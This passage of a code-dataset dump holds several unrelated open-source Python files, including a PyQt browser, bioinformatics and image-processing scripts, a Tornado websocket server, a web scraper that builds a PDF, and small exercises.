current_browser.url()\n            self.update_urlbar(url)\n\n    def get_tab_text_from_url(self, url):\n        # Extract a meaningful tab text from the URL\n        # Example: Get the domain name from the URL\n        domain = url.netloc.split(\"www.\")[-1]  # Remove \"www.\" from the domain\n        domain = domain.split(\".\")[0]  # Remove the extension from the domain\n        return domain\n\n    def add_tab(self):\n        tab = BrowserTab(\"http://www.google.com\")\n        self.tab_widget.addTab(tab, \"Google\")\n        self.tab_widget.setCurrentWidget(tab)\n        self.current_browser().urlChanged.connect(self.update_urlbar)\n\n    def close_tab(self, index):\n        if self.tab_widget.count() > 1:\n            current_widget = self.tab_widget.widget(index)\n            current_widget.deleteLater()\n            self.tab_widget.removeTab(index)\n\n    def navigate_to_url(self):\n        url = self.urlbar.text()\n        q = QUrl(url)\n        if q.scheme() == \"\":\n            url = \"http://\" + url\n            q = QUrl(url)\n        self.current_browser().setUrl(q)\n\n    def update_urlbar(self, q):\n        pixmap = (\n            QPixmap(\"icons/ssl.png\")\n            if q.scheme() == \"https\"\n            else QPixmap(\"icons/lock.png\")\n        )\n        pixmap_size = pixmap.size()  # Get the size of the original pixmap\n        padding = 15  # Width of the padding to add\n\n        new_pixmap = QPixmap(pixmap_size.width() + padding,\n                             pixmap_size.height())  # Create a new pixmap with extra width for the padding\n        new_pixmap.fill(Qt.transparent)  # Fill the pixmap with transparency\n\n        painter = 
QPainter(new_pixmap)\n        painter.drawPixmap(padding, 0, pixmap)  # Draw the original pixmap to the right of the padding\n        painter.end()\n\n        self.httpsicon.setPixmap(new_pixmap)\n\n        url = urlparse(q.toString())\n        self.urlbar.setText(url.netloc + url.path)\n        self.urlbar.setCursorPosition(0)\n        self.update_tab_text(url)\n\n    def current_browser(self):\n        index = self.tab_widget.currentIndex()\n        if index == -1:\n            return None\n        return self.tab_widget.widget(index).browser\n\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n\n    global_settings = QWebEngineSettings.globalSettings()\n    global_settings.setAttribute(QWebEngineSettings.PluginsEnabled, True)\n    global_settings.setAttribute(QWebEngineSettings.FullScreenSupportEnabled, True)\n    global_settings.setAttribute(QWebEngineSettings.JavascriptEnabled, True)\n\n    window = BrowserWindow()\n    window.show()\n    sys.exit(app.exec_())\n","repo_name":"ByNexter/PythonBrowser","sub_path":"PythonBrowser.py","file_name":"PythonBrowser.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6825674842","text":"#!/usr/bin/env python\nimport argparse\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport vcf\n\ndef create_mutation_index(filenames):\n    varindex = defaultdict(list)\n\n    for vf in filenames:\n        vcf_reader = vcf.Reader(filename=vf)\n        for record in vcf_reader:\n            varindex[(record.CHROM, record.POS, record.REF,str(record.ALT))].append(record)\n\n    return varindex\n\n\ndef get_samples_by_record(records):\n    samples = set()\n    for r in records:\n        for rs in r.samples:\n            if rs.sample.endswith('aPC'):\n                samples.add(rs.sample)\n\n    return samples\n\ndef get_genes_by_record(records):\n    genes = set()\n    for r in records:\n        for ann in r.INFO['ANN']:\n            ann_fields = ann.split('|')[3]\n            genes.add(ann_fields)\n    return genes\n\ndef get_mean_dp_by_record(records):\n    DP = []\n    for r in records:\n        for rs in r.samples:\n            if rs.sample.endswith('aPC'):\n                DP.append(r.genotype(rs.sample)['DP'])\n\n    return np.mean(DP)\n\ndef get_mean_sample_field_by_record(records, field):\n    val = []\n    for r in records:\n        for rs in r.samples:\n            if rs.sample.endswith('aPC'):\n                try:\n                    val.append(rs[field])\n                except AttributeError:\n                    pass\n\n    if len(val) > 0:\n        return np.mean(val)\n    else:\n        return 'NA'\n\n\ndef cli_interface():\n    parser = argparse.ArgumentParser(description='VCF to Table.')\n    parser.add_argument('--input', dest='input_filename', nargs='+', type=str, help='input VCF files', required=True)\n    parser.add_argument('--output', dest='output_filename', type=str, help='output CSV files', required=True)\n    args = parser.parse_args()\n    return args\n\n\ndef main():\n    args = cli_interface()\n\n    # creating the mutation index\n    varindex = create_mutation_index(args.input_filename)\n\n    results = []\n    # processing the index\n    for mut, records in varindex.items():\n        # building sample info\n        samples = get_samples_by_record(records)\n        genes = get_genes_by_record(records)\n        dp_info = get_mean_dp_by_record(records)\n        mq_info = get_mean_sample_field_by_record(records, 'MQ')\n        mmq_info = get_mean_sample_field_by_record(records, 'MMQ')\n        for g in genes:\n            tmp_record = [mut[0], mut[1], mut[2], mut[3], dp_info, mq_info, mmq_info, len(samples), \";\".join(samples), g]\n            results.append(tmp_record)\n\n    # converting to dataframe and then to csv\n    data_frame = pd.DataFrame(results, columns=['chrom', 'pos', 'ref','alt', 'dp', 'mq', 'mmq', 'num_samples', 'samples', 'Gene_Name' ])\n\n    
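# Note (descriptive, added for clarity): the table has one row per
    # (variant, gene) pair, and 'num_samples' counts only the samples whose
    # names end in 'aPC' (see get_samples_by_record) that carry the variant.\n    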
data_frame.to_csv(args.output_filename)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"kevs-code/python_parsing_wes","sub_path":"vcftab.py","file_name":"vcftab.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10047154217","text":"import cv2\nimport os\n\n\"\"\"\nThe function below splits videos into frames.\nThe for loop iterates through all video files in the directory.\nThe while loop inside the for loop splits each video into frames.\n\"\"\"\n\n\ndef frame_video():\n    directory_videos = '/home/lab/PycharmProjects/filmy_przyciete/'\n    directory_frames = '/home/lab/PycharmProjects/nagrania_frames/'\n    count = 0\n\n    for video in os.listdir(directory_videos):\n        video = cv2.VideoCapture(directory_videos + video)\n        success, image = video.read()\n\n        while success:\n            cv2.imwrite(directory_frames + 'frame%d.png' % count, image)\n            success, image = video.read()\n            # print('Read a new frame: ', success)\n            count += 1\n\n\ndef crop_image():\n    directory = '/home/lab/PycharmProjects/nagrania_frames/'\n    file_list = os.listdir(directory)\n    x, y, h, w = 160, 80, 650, 1090  # set coordinates that you want\n\n    for index_lista, name in enumerate(file_list):\n        if index_lista % 5 == 0:\n            # print(index_lista)\n            img = cv2.imread(directory + name)\n            crop_img = img[y:h, x:w]\n            cv2.imwrite('/home/lab/PycharmProjects/cropped/' + name, crop_img)\n\n\ndef delete_files():\n    directory = '/home/lab/PycharmProjects/nagrania_frames/'\n\n    for file in os.listdir(directory):\n        os.remove(directory + file)\n\n\nprint('Splitting videos into frames. . .')\nframe_video()\nprint('Start cropping. . .')\ncrop_image()\nprint('Deleting files. . .')\ndelete_files()\nprint('DONE!')\n","repo_name":"krystekkk/videoFrames","sub_path":"crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22507637785","text":"#!/usr/bin/python3\n\"\"\"\nMain file for the task\n\"\"\"\n\n\ndef minOperations(n):\n    \"\"\"\n    Return:\n        the sum of the prime factors of n\n    \"\"\"\n    if (n <= 1):\n        return (0)\n    mul = 2\n    total = 0\n    while (n != 1):\n        if n % mul == 0:\n            n /= mul\n            total += mul\n            mul = 2\n        else:\n            mul += 1\n    return total\n\n\nif __name__ == '__main__':\n    print(minOperations(12))  # smoke test: 12 -> 2 + 2 + 3 = 7\n","repo_name":"FoleKhali/holbertonschool-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11246278274","text":"# Libraries\nfrom statistics import mode\nfrom Scripts.distance_metrics import *\n\ndef euclidean_point(point, points):\n    distances = list()\n    for element in points:\n        distances.append((euclidean(point, element[0]), element[1], element[0]))\n\n    return distances\n\ndef minkowski_point(point, points, p):\n    distances = list()\n    for element in points:\n        distances.append((minkowski(point, element[0], p), element[1], element[0]))\n\n    return distances\n\ndef chebyshev_point(point, points):\n    distances = list()\n    for element in points:\n        distances.append((chebyshev(point, element[0]), element[1], element[0]))\n\n    return distances\n\ndef manhattan_point(point, points):\n    distances = list()\n    for element in points:\n        distances.append((sad(point, element[0]), element[1], element[0]))\n\n    return distances\n\n
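# Illustrative example (hypothetical inputs): with point = [0, 0] and\n# points = [([3, 4], 'A'), ([6, 8], 'B')], euclidean_point returns\n# [(5.0, 'A', [3, 4]), (10.0, 'B', [6, 8])], assuming euclidean() from\n# Scripts.distance_metrics is the usual 2-norm.\n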
# Function that computes the distances from a point to all the other points\ndef point_to_points(point, points, distance):\n    if distance == 'euclidean':\n        return euclidean_point(point, points)\n    elif distance == 'minkowski':\n        p = int(input(\"p value: \"))\n        return minkowski_point(point, points, p)\n    elif distance == 'manhattan':\n        return manhattan_point(point, points)\n    elif distance == 'chebyshev':\n        return chebyshev_point(point, points)\n    else:\n        return \"ERROR: Choose a valid distance function.\"\n\n# Function that returns the k nearest neighbors to the new point\ndef k_neighbors(new_point, dataset, k, metric):\n    # Compute the distances\n    distances = point_to_points(new_point, dataset, metric)\n    distances.sort(key=lambda tup: tup[0])\n\n    # Take the k closest\n    neighbors = list()\n    for i in range(k):\n        neighbors.append(distances[i][1])\n\n    return neighbors, mode(neighbors), distances[:k]\n\n\n# Function that predicts the class for every sample\n# in a new dataset\ndef classify(train_data, test_data, k, metric):\n    xy = [-1, -1]\n    predicted = list()\n    for sample in test_data:\n        xy[0] = k_neighbors(sample[0], train_data, k, metric)[1]\n        xy[1] = sample[1]\n        predicted.append((xy[0], xy[1]))\n\n    return predicted\n","repo_name":"gallardorafael/ML_From_Scratch","sub_path":"Notebooks/Scripts/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73985921155","text":"\nperson = {'name': 'Jack', 'age': 23}\n\n# sentence = 'My name is ' + person['name'] + ' and I am ' + str(person['age']) + ' years old.'\n# print(sentence)\n\n\nsentence = 'My name is {} and I am {} years old.'.format(person['name'], person['age'])\nprint(sentence)\n\n# Print out tagged text\ntag = 'h1'\ntext = 'This is a headline'\n\ntagged_text = '<{0}>{1}</{0}>'.format(tag, text)\nprint(tagged_text)\n\n\nclass Person():\n\n    def __init__(self, name, age):\n        self.name = name\n        self.age = age\n\np1 = Person('Jack', '23')\n\nsentence2 = 'My name is {0.name} and I am {0.age} years old.'.format(p1)\nprint(sentence2)\n\n# sentence = 'My name is {name} and I am {age} years old.'.format(name='Jenn', age='30')\n# print(sentence)\n\n# sentence = 'My name is {name} and I am {age} years old.'.format(**person)\n# print(sentence)\n\n# Print pi to two decimal places\npi = 3.14159265\npi_value = 'Pi is equal to {:.2f}'.format(pi)\n\nprint(pi_value)\n\n\n# Comma separated large values\nsentence3 = '1 MB is equal to {:,} bytes'.format(1000**2)\n\nprint(sentence3)\n\n\n# Print out Dates\nimport datetime\nmy_date = datetime.datetime(2021, 9, 24, 12, 30, 45)\n\n# September 24, 2021\nformatted_date = '{:%B %d, %Y}'.format(my_date)\n\nprint(formatted_date)\n\n# September 24, 2021 fell on a Friday and was the 267 day of the year.\n\nsentence_date = '{0:%B %d, %Y} fell on a {0:%A} and was the {0:%j} day of the year'.format(my_date)\n\nprint(sentence_date)\n","repo_name":"edwardelric11/code_bits","sub_path":"string_formatting/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28475986444","text":"# coding: utf-8\nimport socket\nimport json\nimport logging\n\nimport tornado.web\nimport tornado.websocket\nimport tornado.httpclient\nimport tornado.ioloop\nimport tornado.gen\n\nfrom .models import User, Request, Client, WSProxy\nfrom .interactive import InteractiveServer\n\n\nlogger = logging.getLogger(__file__)\n\n\nclass 
BaseWehSocketHandler:\n def prepare(self):\n self.app = self.settings[\"app\"]\n child, parent = socket.socketpair()\n addr = (self.request.remote_ip, 0)\n self.client = Client(parent, addr, self.current_user)\n self.proxy = WSProxy(self, child)\n self.app.clients.append(self.client)\n\n def get_current_user(self):\n return User(id=1, username=\"guanghongwei\", name=\"广宏伟\")\n\n def check_origin(self, origin):\n return True\n\n\nclass InteractiveWehSocketHandler(BaseWehSocketHandler, tornado.websocket.WebSocketHandler):\n @tornado.web.authenticated\n def open(self):\n request = Request(self.request.remote_ip)\n self.request.__dict__.update(request.__dict__)\n InteractiveServer(self.app, self.request, self.client).activate_async()\n\n def on_message(self, message):\n try:\n message = json.loads(message)\n except json.JSONDecodeError:\n logger.info(\"Loads websocket json message failed\")\n return\n\n if message.get('event'):\n self.evt_handle(message)\n elif message.get('data'):\n self.proxy.send(message)\n\n def on_close(self):\n self.proxy.close()\n\n def evt_handle(self, data):\n if data['event'] == 'change_size':\n try:\n self.request.meta['width'] = data['meta']['width']\n self.request.meta['height'] = data['meta']['height']\n self.request.change_size_event.set()\n except KeyError:\n pass\n\n\nclass ProxyWehSocketHandler(BaseWehSocketHandler):\n pass\n\n\nclass MonitorWehSocketHandler(BaseWehSocketHandler):\n pass\n\n\nclass WSServer:\n routers = [\n (r'/ws/interactive/', InteractiveWehSocketHandler),\n (r'/ws/proxy/(?P[0-9]+)/(?P[0-9]+)/', ProxyWehSocketHandler),\n (r'/ws/session/(?P[0-9]+)/monitor/', MonitorWehSocketHandler),\n ]\n\n # prepare may be rewrite it\n settings = {\n 'cookie_secret': '',\n 'app': None,\n 'login_url': '/login'\n }\n\n def __init__(self, app):\n self.app = app\n self._prepare()\n\n def _prepare(self):\n self.settings['cookie_secret'] = self.app.config['SECRET_KEY']\n self.settings['app'] = self.app\n\n def run(self):\n host = self.app.config[\"BIND_HOST\"]\n port = self.app.config[\"WS_PORT\"]\n print('Starting websocket server at %(host)s:%(port)s' %\n {\"host\": host, \"port\": port})\n ws = tornado.web.Application(self.routers, **self.settings)\n ws.listen(port=port, address=host)\n tornado.ioloop.IOLoop.current().start()\n","repo_name":"ibuler/coco","sub_path":"coco/ws.py","file_name":"ws.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17275725031","text":"from django.shortcuts import render\nimport requests\nfrom django.core.serializers import serialize\nfrom develop.models import TrackArea\nfrom arcgis2geojson import arcgis2geojson\nfrom django.views.decorators.clickjacking import xframe_options_exempt\n\n\ndef get_ncod_data():\n url = \"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Overlays/MapServer/9/query?where=1%3D1&outFields\" \\\n \"=*&outSR=4326&f=json\"\n\n return requests.request(\"GET\", url, headers={}, data={})\n\n\n@xframe_options_exempt\ndef itb(request):\n itb_data = serialize(\"geojson\", TrackArea.objects.all(), geometry_field=\"geom\", fields=(\"long_name\",))\n\n return render(request, \"itb.html\", {\"itb_data\": itb_data})\n\n\n@xframe_options_exempt\ndef ncod(request):\n ncod_response = get_ncod_data()\n ncod_data = arcgis2geojson(ncod_response.json())\n\n return render(request, \"ncod.html\", {\"ncod_data\": ncod_data})\n\n\n@xframe_options_exempt\ndef dx_zoning(request):\n url = 
\"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Zoning/MapServer/0/query?outFields=*&outSR=4326&f\" \\\n \"=json&where=ZONE_TYPE='DX-'\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n dx_zoning_data = arcgis2geojson(response.json())\n\n return render(request, \"dx.html\", {\"dx_zoning_data\": dx_zoning_data})\n\n\n@xframe_options_exempt\ndef dx_zoning40(request):\n # Keep this on one line unless you want to investigate why it doesn't work when on two.\n url = \"https://maps.raleighnc.gov/arcgis/rest/services/Planning/Zoning/MapServer/0/query?outFields=*&outSR=4326&f\" \\\n \"=json&where=HEIGHT>30 AND ZONE_TYPE='DX-'\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n dx40_zoning_data = arcgis2geojson(response.json())\n\n return render(request, \"dx.html\", {\"dx_zoning_data\": dx40_zoning_data})\n","repo_name":"dtraleigh/dtraleigh","sub_path":"develop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14538101215","text":"\"\"\"\nThis module processes client requests, fetches databases, and writes responses.\n\"\"\"\n\n__version__ = \"0.1\"\n__author__ = \"Aleksei Mashlakov\"\n\nimport os\nimport sys\n\nfrom tornado.escape import json_decode, json_encode\nfrom tornado.ioloop import IOLoop\nfrom tornado.locks import Semaphore\nfrom tornado.web import RequestHandler\n\nfrom interface.encryption import RSAEncryption\n\n# sem = Semaphore(1)\n\ntry:\n import logging\n\n from __main__ import logger_name\n\n log = logging.getLogger(logger_name)\nexcept Exception as e:\n log = logging.getLogger(\"PLATFORM\")\n\n\nclass BasicHandler(RequestHandler):\n def initialize(self, database):\n self.db = database\n\n async def prepare(self):\n if self.request.headers.get(\"Content-Type\", \"\").startswith(\"application/json\"):\n self.json_args = json_decode(self.request.body)\n else:\n self.json_args = None\n self.send_error(status_code=400, reason=\"Content-Type must be JSON\")\n\n async def post(self):\n try:\n # async with sem:\n # response = await self.db.handle_request(self.json_args)\n response = await self.db.handle_request(self.json_args)\n self.write(json_encode(response))\n except ValueError:\n self.send_error(400, reason=\"Unable to parse JSON.\") # Bad Request\n\n\nclass EncryptedHandler(RequestHandler):\n def initialize(self, database):\n self.db = database\n\n async def prepare(self):\n if self.request.headers.get(\"Content-Type\", \"\").startswith(\"application/json\"):\n self.json_args = json_decode(RSAEncryption().decrypt(self.request.body))\n else:\n self.json_args = None\n self.send_error(status_code=400, reason=\"Content-Type must be JSON\")\n\n async def post(self):\n try:\n # async with sem:\n # response = await self.db.handle_request(self.json_args)\n response = await self.db.handle_request(self.json_args)\n encrypted_response = RSAEncryption().encrypt(json_encode(response))\n self.write(encrypted_response)\n except ValueError:\n self.send_error(400, reason=\"Unable to parse JSON.\") # Bad Request\n\n\nclass ShutdownHandler(RequestHandler):\n async def post(self):\n try:\n self.write(json_encode({\"success\": True}))\n IOLoop.current().stop()\n except ValueError:\n self.send_error(400, reason=\"Bad 
Request.\")\n","repo_name":"aleksei-mashlakov/flexibility-metadata-registry","sub_path":"platform/interface/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6607496948","text":"from reportlab.lib.pagesizes import A4\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer, Image, Flowable,Table\nfrom reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle\nfrom reportlab.pdfbase import pdfmetrics\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.lib.units import inch\nfrom scraper import scrape\nfrom io import BytesIO\nimport PIL\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nbase_url = \"http://random-art.org/\"\nproxies = {\n\n}\n\ndef scrape(s,e,popularity=False):\n payload = {\n 'page':'',\n 'sort':'time'\n }\n if popularity:\n payload['sort']='popularity'\n img_list = []\n count = 1\n for n,i in enumerate(range(s,e+1)):\n print(\"[x] Page \" + str(n+1))\n payload['page']=str(i)\n r = requests.get(base_url,payload,proxies=proxies).content\n soup = bs(r,'html.parser')\n tags = soup.findAll(attrs={'class':'image'})\n for tag in tags:\n _img = tag.find('img')\n img={}\n img['count']= count\n img['src']=_img.get('src').replace('small','large')\n img['alt']=_img.get('alt')\n img_list.append(img)\n count+=1\n return img_list\n\nimg_list = scrape(1,20,True)\nlist_size = len(img_list)\nprint(\"[x]Total Images Scraped : \",list_size)\n#Downloading the images into a folder\nprint('[x]Downloading Images')\nfor img in img_list:\n sys.stdout.write('\\r')\n percent = img['count']*100/list_size\n url = base_url+img['src']\n r = requests.get(url,proxies=proxies)\n image = PIL.Image.open(BytesIO(r.content))\n image.save('images\\\\'+str(img['count'])+\".jpg\",format='JPEG')\n sys.stdout.write(\"%d%%\"%percent)\n sys.stdout.flush()\n\n\npdfmetrics.registerFont(TTFont('consolas', 'unifont-9.0.01.ttf'))\ndoc = SimpleDocTemplate(\"test.pdf\",pagesize=A4,\n rightMargin=40,leftMargin=40,\n topMargin=40,bottomMargin=18)\nstyles = getSampleStyleSheet()\nstyleH = styles['Heading1']\nstyleN = styles['Normal']\n\n\nprint('[x]Building pdf')\nStory=[]\nStory.append(Paragraph(\"random-art\",styleH))\nStory.append(Spacer(1,10)) \nStory.append(Paragraph('''\n The pictures in this gallery are made by a computer program.\n The program accepts the name of a picture and uses it as a seed\n from which a picture is generated randomly.\n The same name always yields the same picture.\n '''\n ,styleN))\nStory.append(Spacer(1,10)) \nStory.append(Paragraph('''\n The author of the random art program is \n Andrej Bauer.\n '''\n ,styleN))\nStory.append(Spacer(1,20))\nStory.append(Paragraph(\"catalogue\",styleH))\nStory.append(Spacer(1,10)) \nprint(\"Building Table\")\nfor i in range(0,list_size,3):\n tbl_data=[\n [Image(\"images\\\\\"+str(img_list[i]['count'])+\".jpg\",1.5*inch,1.5*inch),\n Image(\"images\\\\\"+str(img_list[i+1]['count'])+\".jpg\",1.5*inch,1.5*inch),\n Image(\"images\\\\\"+str(img_list[i+2]['count'])+\".jpg\",1.5*inch,1.5*inch)\n ],\n [\n Paragraph('''%s''' % img_list[i]['alt'],styleN),\n Paragraph('''%s''' % img_list[i+1]['alt'],styleN),\n Paragraph('''%s''' % img_list[i+2]['alt'],styleN)\n ]\n ]\n Story.append(Table(tbl_data,colWidths=[2.2*inch,2.2*inch,2.2*inch]))\n 
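# leave a small vertical gap below each row of thumbnails\n    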
Story.append(Spacer(1,12))\n\n\ndoc.build(Story)\n\n\n","repo_name":"TheChesireCat/art","sub_path":"gen_pdf.py","file_name":"gen_pdf.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23148565312","text":"def main():\n A, B, K = map(int, input().split())\n count = 0\n number = min(A, B)\n while True:\n if A % number == 0 and B % number == 0:\n count += 1\n if count == K:\n break\n number -= 1\n print(number)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tomoki-Kikuta/atcoder","sub_path":"abc120/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23378033071","text":"import sys\r\n\r\n\r\ndef determine_gamestate(board):\r\n winX = test_won(board, \"X\")\r\n winO = test_won(board, \"O\")\r\n if winX and not winO:\r\n return \"X won\"\r\n elif winO and not winX:\r\n return \"O won\"\r\n elif test_finished(board):\r\n return \"Draw\"\r\n else:\r\n return \"Game has not completed\"\r\n\r\n\r\ndef test_finished(board):\r\n return not any((item == '.') for row in board for item in row)\r\n\r\n\r\ndef test_won(board, sign):\r\n return any(test_combination(comb, sign) for comb in get_possible_combinations(board))\r\n\r\n\r\ndef test_combination(combination, sign):\r\n return all(x in [sign, \"T\"] for x in combination)\r\n\r\n\r\ndef get_possible_combinations(board):\r\n return [\r\n [board[0][0], board[1][0], board[2][0], board[3][0]],\r\n [board[0][1], board[1][1], board[2][1], board[3][1]],\r\n [board[0][2], board[1][2], board[2][2], board[3][2]],\r\n [board[0][3], board[1][3], board[2][3], board[3][3]],\r\n\r\n [board[0][0], board[0][1], board[0][2], board[0][3]],\r\n [board[1][0], board[1][1], board[1][2], board[1][3]],\r\n [board[2][0], board[2][1], board[2][2], board[2][3]],\r\n [board[3][0], board[3][1], board[3][2], board[3][3]],\r\n\r\n [board[0][0], board[1][1], board[2][2], board[3][3]],\r\n [board[0][3], board[1][2], board[2][1], board[3][0]]\r\n ]\r\n\r\n\r\ndef get_boards(path):\r\n with open(path) as f:\r\n lines = f.readlines()\r\n\r\n num_boards = int(lines[0])\r\n return num_boards, ([lines[5*i+j] for j in range(1, 5)] for i in range(num_boards))\r\n\r\nif __name__ == '__main__':\r\n print(sys.argv[1])\r\n num_boards, boards = get_boards(sys.argv[1])\r\n for i in range(num_boards):\r\n print(\"Case #{gamenum}: {gamestate}\".format(gamenum=i+1, gamestate=determine_gamestate(boards.__next__())))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_116/1030.py","file_name":"1030.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44447092172","text":"\"\"\"\nRead json file containing six dictionaries about sound and phonotactic\ncorrespondences and turn it into a human-readable tsv-file with additional\ninfo for easier manual inspection.\n\"\"\"\n\nimport csv\nimport re\n\nfrom loanpy.utils import scjson2tsv\n\ndef run(args):\n \"\"\"\n #. Read forms.csv\n #. Convert it so that it corresponds to the sample input file in\n lingpy's documentation at\n https://github.com/lingpy/lingpy/blob/master/tests/test_data/KSL.qlc\n #. 
Write that file to the folder ``lingpy``.\n    \"\"\"\n\n    with open(\"cldf/forms.csv\") as f:\n        forms = list(csv.reader(f))\n\n    with open(\"lingpy/wot.tsv\", \"w+\") as f:\n        writer = csv.writer(f, delimiter=\"\\t\")\n        writer.writerow(['# KSL'])\n        writer.writerow([\n            'ID', 'DOCULECT', 'CONCEPT', 'GlossID',\n            'Orthography', 'IPA', 'Tokens', 'CogID'\n        ])\n\n        for i, row in enumerate(forms[1:]):\n            if i == 0 or row[9] != forms[i][9]:  # cognacy\n                writer.writerow([\"#\"])\n\n            newrow = [i, row[2], row[3], row[9],\n                      row[5], re.sub(\"[. ]\", \"\", row[6]), row[6], row[9]]\n\n            writer.writerow(newrow)\n","repo_name":"LoanpyDataHub/ronataswestoldturkic","sub_path":"ronataswestoldturkiccommands/makelingpyinput.py","file_name":"makelingpyinput.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1168551042","text":"'''\r\nAuthor: Night-stars-1 nujj1042633805@gmail.com\r\nDate: 2023-05-23 17:39:27\r\nLastEditors: Night-stars-1 nujj1042633805@gmail.com\r\nLastEditTime: 2023-07-14 22:44:33\r\nDescription: \r\n\r\nCopyright (c) 2023 by Night-stars-1, All Rights Reserved. \r\n'''\r\nfrom ctypes import windll\r\nimport pygetwindow as gw\r\nfrom PIL import ImageGrab\r\n\r\nfrom utils.config import sra_config_obj, normalize_file_path, CONFIG_FILE_NAME\r\nfrom utils.log import log\r\n\r\n\r\ndef get_width(title):\r\n    window = gw.getWindowsWithTitle(title)[0]\r\n    hwnd = window._hWnd\r\n\r\n    # Get the size of the active window\r\n    window_rect = window.width, window.height\r\n\r\n    user32 = windll.user32\r\n    desktop_width = user32.GetSystemMetrics(0)\r\n    desktop_height = user32.GetSystemMetrics(1)\r\n    \r\n    # Width and height of a single-display screen:\r\n    img = ImageGrab.grab()\r\n    width, height=img.size\r\n\r\n    scaling = round(width/desktop_width*100)/100\r\n    \"\"\" \r\n    # Get the scaling factor of the current display\r\n    dc = win32gui.GetWindowDC(hwnd)\r\n    dpi_x = win32print.GetDeviceCaps(dc, win32con.LOGPIXELSX)\r\n    dpi_y = win32print.GetDeviceCaps(dc, win32con.LOGPIXELSY)\r\n    win32gui.ReleaseDC(hwnd, dc)\r\n    scale_x = dpi_x / 96\r\n    scale_y = dpi_y / 96\r\n    log.info(f\"Real : {width} x {height} {dc} x {dc}\")\r\n    \"\"\"\r\n\r\n    # Compute the real resolution\r\n    real_width = int(window_rect[0])\r\n    real_height = int(window_rect[1])\r\n    borderless = True if real_width*scaling == 1920 else False\r\n    left_border = (real_width*scaling-1920)/2\r\n    up_border = (real_height*scaling-1080)-left_border\r\n    real_width1 = 1920\r\n    real_height1 = 1080\r\n\r\n    log.info(f\"Real resolution: {real_width} x {real_height} x {scaling} x {borderless}\")\r\n\r\n    sra_config_obj.real_width = real_width1\r\n    sra_config_obj.real_height = real_height1\r\n    sra_config_obj.scaling = scaling\r\n    sra_config_obj.borderless = borderless\r\n    sra_config_obj.left_border = left_border\r\n    sra_config_obj.up_border = up_border\r\n\r\n    # Make the process DPI-aware to rule out scaling interference\r\n    windll.user32.SetProcessDPIAware()\r\n    ","repo_name":"Starry-Wind/StarRailAssistant","sub_path":"get_width.py","file_name":"get_width.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":2252,"dataset":"github-code","pt":"61"} +{"seq_id":"28703923722","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport numpy as np\nfrom math import sqrt, cos, sin\nfrom Meshes.matrix import *\nfrom Meshes.tools import boundingBox\n\ntry:\n    basestring\nexcept NameError:\n    basestring = str\n\nclass Mesh(object):\n    def __init__(self, 
